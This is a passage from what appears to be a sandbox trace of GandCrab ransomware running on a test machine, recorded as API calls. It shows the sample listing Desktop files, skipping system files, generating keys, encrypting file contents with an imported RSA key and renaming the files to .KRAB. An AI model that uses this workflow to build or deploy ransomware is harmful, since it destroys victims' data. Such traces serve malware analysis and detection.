leylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0086.387] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0086.388] CloseHandle (hObject=0x3a8) returned 1 [0086.388] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.388] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.388] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x21, wMilliseconds=0x245)) [0086.388] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.389] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.389] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.389] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\d2ca4a08d2ca4dee3d.lock") returned 69 [0086.389] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0086.391] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.391] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.391] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\") returned 46 [0086.391] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\*" [0086.391] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0x10231f8 [0086.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.392] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0086.392] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.392] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.392] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0086.392] lstrcmpW (lpString1="6RTrbjg.png", lpString2=".") returned 1 [0086.392] lstrcmpW (lpString1="6RTrbjg.png", lpString2="..") returned 1 [0086.392] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\", lpString2="6RTrbjg.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\6RTrbjg.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\6RTrbjg.png" [0086.392] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.392] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\6RTrbjg.png.KRAB") returned 62 [0086.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\6RTrbjg.png") returned 57 [0086.392] lstrlenW (lpString=".png") returned 4 [0086.392] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.393] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0086.393] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.393] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\6RTrbjg.png") returned 57 [0086.393] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\6RTrbjg.png") returned 57 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="desktop.ini") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="autorun.inf") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="ntuser.dat") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="iconcache.db") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="bootsect.bak") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="boot.ini") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="ntuser.dat.log") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="thumbs.db") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="KRAB-DECRYPT.html") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.393] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.394] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="ntldr") returned -1 [0086.394] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="NTDETECT.COM") returned -1 [0086.394] lstrcmpiW (lpString1="6RTrbjg.png", lpString2="Bootfont.bin") returned -1 [0086.394] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.394] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011238) returned 1 [0086.395] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.396] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.396] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.396] CryptGenRandom (in: hProv=0x1011238, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0086.396] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0086.396] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.397] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10112c0) returned 1 [0086.398] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.399] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.399] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.399] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0086.399] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0086.399] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.400] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010f08) returned 1 [0086.401] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023038) returned 1 [0086.401] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0086.401] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0086.402] GetLastError () returned 0x0 [0086.402] CryptDestroyKey (hKey=0x1023038) returned 1 [0086.402] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0086.402] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010bd8) returned 1 [0086.403] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x10235f8) returned 1 [0086.403] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0086.403] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0086.404] GetLastError () returned 0x0 [0086.404] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.404] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0086.404] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\6RTrbjg.png" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\6rtrbjg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0086.404] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.405] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.405] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xba38, lpOverlapped=0x0) returned 1 [0086.419] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff45c8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.419] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xba38, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xba38, lpOverlapped=0x0) returned 1 [0086.419] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0086.419] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.424] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.425] CloseHandle (hObject=0x474) returned 1 [0086.425] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.426] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\6RTrbjg.png" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\6rtrbjg.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\6RTrbjg.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\6rtrbjg.png.krab")) returned 1 [0086.426] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.427] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0086.427] lstrcmpW (lpString1="clmjWqYhgKOEEQ.swf", lpString2=".") returned 1 [0086.427] lstrcmpW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="..") returned 1 [0086.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\", lpString2="clmjWqYhgKOEEQ.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\clmjWqYhgKOEEQ.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\clmjWqYhgKOEEQ.swf" [0086.427] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.427] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\clmjWqYhgKOEEQ.swf.KRAB") returned 69 [0086.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\clmjWqYhgKOEEQ.swf") returned 64 [0086.427] lstrlenW (lpString=".swf") returned 4 [0086.427] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.428] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".swf ") returned 5 [0086.428] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\clmjWqYhgKOEEQ.swf") returned 64 [0086.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\clmjWqYhgKOEEQ.swf") returned 64 [0086.428] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="desktop.ini") returned -1 [0086.428] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="autorun.inf") returned 1 [0086.428] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="ntuser.dat") returned -1 [0086.428] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="iconcache.db") returned -1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="bootsect.bak") returned 1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="boot.ini") returned 1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="ntuser.dat.log") returned -1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="thumbs.db") returned -1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="ntldr") returned -1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="NTDETECT.COM") returned -1 [0086.429] lstrcmpiW (lpString1="clmjWqYhgKOEEQ.swf", lpString2="Bootfont.bin") returned 1 [0086.429] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.429] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010b50) returned 1 [0086.431] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.431] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.432] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.432] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0086.432] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0086.432] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.432] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011700) returned 1 [0086.434] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.434] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.434] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.434] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0086.435] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.435] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.435] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10108a8) returned 1 [0086.436] CryptImportKey (in: hProv=0x10108a8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1022ff8) returned 1 [0086.437] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0086.437] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0086.437] GetLastError () returned 0x0 [0086.437] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.437] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0086.437] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010bd8) returned 1 [0086.439] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x10230f8) returned 1 [0086.439] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0086.439] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0086.439] GetLastError () returned 0x0 [0086.439] CryptDestroyKey (hKey=0x10230f8) returned 1 [0086.439] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0086.439] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\clmjWqYhgKOEEQ.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\clmjwqyhgkoeeq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0086.440] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.440] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.441] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xe351, lpOverlapped=0x0) returned 1 [0086.454] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff1caf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.455] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xe351, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xe351, lpOverlapped=0x0) returned 1 [0086.455] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0086.455] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.459] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.460] CloseHandle (hObject=0x474) returned 1 [0086.460] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.460] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\clmjWqYhgKOEEQ.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\clmjwqyhgkoeeq.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\clmjWqYhgKOEEQ.swf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\clmjwqyhgkoeeq.swf.krab")) returned 1 [0086.461] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.462] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0086.462] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0086.462] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0086.462] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\d2ca4a08d2ca4dee3d.lock" [0086.462] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.462] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 74 [0086.462] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\d2ca4a08d2ca4dee3d.lock") returned 69 [0086.462] lstrlenW 